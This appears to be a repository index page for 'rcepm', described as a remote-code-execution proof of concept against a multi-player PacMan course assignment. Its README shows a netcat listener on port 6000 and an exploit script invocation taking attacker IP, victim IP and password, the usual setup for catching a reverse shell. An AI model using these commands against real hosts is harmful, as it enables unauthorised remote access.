https://github.com/oelin/rcepm
RCE exploit PoC for multi-player PacMan.
https://github.com/oelin/rcepm
exploit pacman poc proof-of-concept rce remote-code-execution
Last synced: 3 days ago
JSON representation
RCE exploit PoC for multi-player PacMan.
- Host: GitHub
- URL: https://github.com/oelin/rcepm
- Owner: oelin
- License: mit
- Created: 2023-01-25T13:23:43.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2023-01-25T13:28:27.000Z (over 3 years ago)
- Last Synced: 2025-12-12T23:40:02.713Z (6 months ago)
- Topics: exploit, pacman, poc, proof-of-concept, rce, remote-code-execution
- Language: Python
- Homepage:
- Size: 6.84 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# rcepm
RCE exploit PoC for [multi-player PacMan](https://github.com/mhandley/ENGF2-2022/tree/master/assignments/assignment5).
## Usage
```sh
$ nc -lv 6000
```
```sh
$ python3 rce.py [your ip] [player ip] [password]'
```